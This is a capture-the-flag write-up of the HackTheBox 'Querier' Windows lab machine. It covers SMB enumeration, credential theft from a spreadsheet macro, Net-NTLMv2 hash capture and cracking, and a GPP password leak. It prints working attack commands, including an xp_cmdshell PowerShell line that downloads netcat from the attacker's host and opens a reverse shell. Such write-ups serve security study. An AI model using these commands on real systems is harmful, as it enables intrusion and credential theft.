HackTheBox Querier write-up

(Difficulty: Medium)

Reconnaissance


PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-18T06:59:42
| Not valid after:  2049-06-18T06:59:42
| MD5:   45e9 7ca1 4c0e 6166 a02c d90d be27 be4b
|_SHA-1: 737c edcc 1d5e 696a 9f1d 680f ba0b 3395 eb81 1dea
|_ssl-date: 2019-06-21T22:13:02+00:00; -1h07m06s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
nmap -A -v -sS -f -T4 -p- -oN nmap.txt 10.10.10.125

As this is a Windows machine, the first thing I do is to see if there are any improperly configured shares by enumerating any network shares. After some trial and error of attempting blank usernames and passwords, I discover that the Guest user account is in fact enabled, blank passwords are allowed, and there is even a readable share!

I use smbmap to enumerate shares smbmap -u Guest -H 10.10.10.125

Reports          READ ONLY

I will be using multiple Impacket tools on this machine. If you do not have Impacket installed you can install it this way sudo pip install impacket

To navigate the share I use Impacket's smbclient.py to to browse the Reports share using a blank password with the Guest account

smbclient.py -no-pass Guest@10.10.10.125

use Reports

ls

-rw-rw-rw-      12229  Mon Jan 28 18:26:31 2019 Currency Volume Report.xlsm

get Currency Volume Report.xlsm

exit

As I am on a Kali machine I do not have something generic such as Microsoft Excel to open the spreadsheet file so I install LibreOffice which is an open-source office suite project.

apt install libreoffice -y

libreoffice "Currency Volume Report.xlsm"

I get a warning about macros existing which encourages me to curiously look for the macros (Tools -> Macros -> Edit Macros)

conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"

This appears to be an ADO connection string containing the database, username, and password for the SQL server that showed up in the Nmap scan from before.

I use those credentials in Impacket's mssqlclient.py and I make sure to escape the $ using a backslash \ as I want the character to be taken literally by bash

mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.10.10.125

One way to execute a local Windows command on SQL server is using the xp_cmdshell function, provided it is enabled. I decide to attempt to enable xp_cmdshell as it is disabled by default as a security measure by Microsoft.

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE

[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.

It appears the user account I am using lacks the permissions to execute code, though, the MSSQL service account or the sa (Server Administrator) user would have.

I decide to resort to cracking the service account's hash. I can potentially use SQL functions to force the SQL server to connect to a SMB resource that I control which forces a challenge and uses a Net-NTLMv2 response to authenticate against it in order to access a resource. For such an attack to work I need three things:

  1. SMB server designed for Net-NTLMv2 interception or a SMB server and a network sniffer to inspect the TCP packets containing the challenge provided my server requires authentication of some sort
  2. Some way to force the SQL server to connect to said SMB server remotely through a remote UNC path
  3. A service account password weak enough that it can be cracked from the captured Net-NTLMv2 response

The easiest way to accomplish this attack is to use Impacket's smbserver.py which is intended for such interceptions combined with the xp_dirtree SQL function which can access a remote directory and doesn't need escalated privileges.

I started up my SMB server smbserver.py evil /tmp -smb2support

And I issue this command through the interactive mssqlclient.py session from earlier exec master..xp_dirtree '\10.0.0.0\evil\this_file_doesnt_exist.pranked'

Incoming connection (10.10.10.125,49737)
AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
User mssql-svc\QUERIER authenticated successfully

And the next message contains the Net-NTLMv2 hash

mssql-svc::QUERIER:4141414141414141:f6b519ce30c586c47374bf3d3169fe86:010100000000000000c99c5e9128d501d04a88bc975178e100000000010010007000500078007300580053006f006500020010004a004100530054004500590071005200030010007000500078007300580053006f006500040010004a0041005300540045005900710052000700080000c99c5e9128d50106000400020000000800300030000000000000000000000000300000024376f87932d66216b1992f9687c82319ba64309a98775974eb8fd149c618fe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003300000000000000000000000000

So I use hashcat to crack it

hashcat --force -m 5600 "mssql-svc::QUERIER:4141414141414141:f6b519ce30c586c47374bf3d3169fe86:010100000000000000c99c5e9128d501d04a88bc975178e100000000010010007000500078007300580053006f006500020010004a004100530054004500590071005200030010007000500078007300580053006f006500040010004a0041005300540045005900710052000700080000c99c5e9128d50106000400020000000800300030000000000000000000000000300000024376f87932d66216b1992f9687c82319ba64309a98775974eb8fd149c618fe0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0032003300000000000000000000000000" /usr/share/wordlists/rockyou.txt
mssql-svc:corporate568

Foothold


Using the MSSQL service account's credentials I create a new interactive SQL session

mssqlclient.py -windows-auth mssql-svc:corporate568@10.10.10.125

I run the commands to enable xp_cmdshell from earlier, once again, but now with elevated privileges

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE

Then I start up a quick HTTP server to serve nc.exe cd /usr/share/windows-binaries/ && python -m SimpleHTTPServer 80 and setup my netcat listener nc -nvlp 443

I then send the command to the interactive session to download nc.exe to the temp directory and connect back to my listener using Powershell through nc.exe

exec master..xp_cmdshell 'powershell -ep bypass Invoke-Webrequest -Uri http://10.0.0.0/nc.exe -OutFile $env:temp\nc.exe; powershell $env:temp\nc.exe -e powershell 10.0.0.0 443'

Privilege escalation


After spending some brief time unable to find anything obvious to leverage, I decide to use the PowerUp module from PowerSploit to check for interesting things automatically. I utilize the smbserver.py still running from before to serve the PowerSploit directory to the target computer. First I locally download PowerSploit to the directory being served by my SMB server on my local machine

git clone https://github.com/PowerShellMafia/PowerSploit /tmp/PowerSploit

Then I copy those files remotely to the Powershell module directory for the current user (mssql-svc) and import the main module

$modpath = [Environment]::GetFolderPath('MyDocuments') + "\WindowsPowerShell\Modules"
Copy-Item \\10.0.0.0\evil\PowerSploit $modpath -Recurse
Import-Module $modpath\PowerSploit\PowerSploit.psm1

This may take 5-15 minutes

Once completed, I run the bulk privilege escalation check function Invoke-AllChecks

[*] Checking for cached Group Policy Preferences .xml files....
Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
Policy\History{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

Administrator:MyUnclesAreMarioAndLuigi!!1!

It appears there are Group Policy Preferences passwords stored. Unfortunately GPP does not encrypt the passwords with the best encryption. While it does use AES, the key is only 32 bytes and is publicly known.

I can use Impacket's psexec.py to get a SYSTEM shell with those credentials

psexec.py Administrator@10.10.10.125

And to get the flags type C:\Users\mssql-svc\Desktop\user.txt C:\Users\Administrator\Desktop\root.txt

I had a lot of fun in this box as I was able to use some of the skills I learned from the HTB Offshore Pro Lab. I would highly recommend that lab if you want to start learning about Active Directory attacks and misconfigurations.

Thanks for reading and shoutouts to mrh4sh and egre55 for this cool box!

Author image
I like popping shells and setting up cloud stuff

Recent Posts

HackTheBox Fortune write-up
September 07, 2019
HackTheBox Netmon write-up
June 30, 2019
HackTheBox Querier write-up
June 22, 2019
HackTheBox Help write-up
June 08, 2019